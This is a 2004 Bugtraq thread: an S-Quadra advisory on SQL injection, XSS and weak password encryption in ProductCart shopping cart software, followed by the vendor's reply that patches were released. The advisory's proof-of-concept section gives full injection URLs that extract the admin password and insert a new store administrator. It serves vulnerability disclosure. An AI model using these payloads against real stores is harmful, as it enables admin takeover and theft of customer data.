From research@s-quadra.com Wed Feb 18 16:35:38 2004 From: S-Quadra Security Research To: bugtraq Date: Wed, 18 Feb 2004 11:14:48 +0300 Subject: EarlyImpact ProductCart shopping cart software multiple security vulnerabilities S-Quadra Advisory #2004-02-16 Topic: EarlyImpact ProductCart shopping cart software multiple security vulnerabilities Severity: High Vendor URL: http://www.earlyimpact.com Advisory URL: http://www.s-quadra.com/advisories/Adv-20040216.txt Release date: 16 Feb 2004 1. DESCRIPTION ProductCart is a shopping cart application for e-commerce enabled sites. Its written on ASP, works on most Windows platforms and uses MS Access or MS SQL Server as a backend. Please visit http://www.earlyimpact.com for information about ProductCart shopping cart. 2. DETAILS -- Vulnerability 1: Incorrect use of cryptography ProductCart software uses stream cipher algorithm (possibly RC4) to encrypt various passwords before storing them in a database. A stream cipher generates a keystream (a sequence of bits used as a key). Encryption is accomplished by combining the keystream with the plaintext with the bitwise XOR operation. The generation of the keystream is independent of the plaintext and ciphertext. In ProductCart the single cryptographic key used to encrypt all customers and store administrator passwords so it's possible for an attacker to perform a choosen plaintext attack and obtain first 100 bytes of keystream (maximum length of customer password). Using this bytes an attacker can decrypt any encrypted information from the database including store administrator password. -- Vulnerability 2: SQL Injection vulnerability An SQL Injection vulnerability has been found in the 'advSearch_h.asp' script. Inproper use of user supplied input filters allows an attacker to modify SQL query and perform some kinds of SQL injection attacks. Successfull exploitation of this vulnerability could allow an attacker to gain administrative access to ProductCart store and read any information from store database (i.e. customers private data). Also an attacker could execute arbitrary commands using xp_cmdshell function. -- Vulnerability 3: Cross Site Scripting vulnerability in 'Custva.asp' By injecting specially crafted javascript code in url and tricking a user to visit it a remote attacker can steal user session id and gain access to user's personal data. -- PoC code --Vulnerability 1 and 2: Platform: MS SQL Server as a backend ProductCart software incorrect uses cryptographic algorithms to protect store administrator password. Combination of this error and SQL injection vulnerability allow an attacker to gain administrative access to store. Performing following scenarion an attaker can find the store administrator username and password. Scenario: 1. An attacker register new customer in store. Let the value of field 'Postal Code' in the registration form will be equal to '987654' and an attacker must select long password (it should be longer then the store administrator password). 2. An attacker performs the following request http://[target]/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;u--pdate%20customers%20set%20name=(s--elect%20top%201%20idadmin%20from%20admins),lastName=(s--elect%20top%01%20adminpassword%20from%20admins),phone=(s--elect%20password%20from%20customers%20where%20zip=987654)%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&IDBrand=0&resultCnt=200&Submit.x=33& 3. An attacker goes to http://[target]/productcart/pc/Custmoda.asp and reads his personal information. The value of the "FirstName" field in this form will be store administrator login name. Store administrator password is easy to find by this formula: adminpass = (Last Name) xor (Phone) xor (customer login password from scenario step 1) In the following scenario an attacker can add a new administrator to store Scenario: 1. An attacker register new customer in store. Let the value of 'First Name' field in registration form will be equal to '1*2*3*4*5*6*7*8*9*10*', the value of 'Last Name ' field will be equal to '34567', the value of 'Password' field will be equal to '111' and the value of 'Postal Code' field will be equal to '987654'. 2. An attacker performs the following request: http://[target]/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;in--sert%20into%20admins%20(idadmin,%20adminpassword,%20adminlevel)%20s--elect%20lastName,%20password,%20name%20from%20customers%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&IDBrand=0&resultCnt=200&Submit.x=33& 3. An attacker logs into the store admin interface with username '34567' and password '111'. -- Vulnerability 3: http://[target]/productcart/pc/Custva.asp?redirectUrl="><" 3. FIX INFORMATION S-Quadra alerted EarlyImpact development team to this issue on 29th January 2004. 4. CREDITS Nick Gudov is responsible for discovering this issue. 5. ABOUT S-Quadra offers services in computer security, penetration testing and network assesment, web application security, source code review and third party product vulnerability assesment, forensic support and reverse engineering. S-Quadra Advisory #2004-02-16 From info@earlyimpact.com Wed Feb 18 16:35:53 2004 From: Massimo Arrigoni To: bugtraq@securityfocus.com Date: 18 Feb 2004 17:27:32 -0000 Subject: Re: EarlyImpact ProductCart shopping cart software multiple security vulnerabilities In-Reply-To: <40331EF8.6000700@s-quadra.com> Regarding: S-Quadra Advisory #2004-02-16 http://www.securityfocus.com/archive/1/354288/2004-02-15/2004-02-21/0 S-Quadra was given specific information about available fixes and other comments related to the alleged security vulnerabilities. Yet they decided not to post any of them. This behavior seems highly unprofessional. The following is Early Impact's official response to the alleged vulnerabilities concerning the company's ProductCart ecommerce software. -- Vulnerability 1: Incorrect use of cryptography Early Impact official response: Vulnerability 1 cannot be exploited since vulnerability 2 and 3 have been addressed. Nevertheless, Early Impact is further investigating the issue and will look at alternative uses of cryptography for future versions of ProductCart. -- Vulnerability 2: SQL Injection vulnerability Early Impact official response: Vulnerability 2 was addressed with the Security Patch released on 01.30.2004, which is available for download at no charge from http://www.earlyimpact.com/productcart/support/ - This vulnerability does not apply to ProductCart v2.53 and above. All users of ProductCart v2.52 and below were notified of this security issue and of the availability of the corresponding Security Patch upon its release. -- Vulnerability 3: Cross Site Scripting vulnerability in 'Custva.asp' Early Impact official response: Vulnerability 3 was addressed with the Security Patch released on 01.30.2004, which is available for download at no charge from http://www.earlyimpact.com/productcart/support/ - This vulnerability does not apply to ProductCart v2.53 and above. All users of ProductCart v2.52 and below were notified of this security issue and of the availability of the corresponding Security Patch upon its release. If you need additional information, please contact Early Impact at info@earlyimpact.com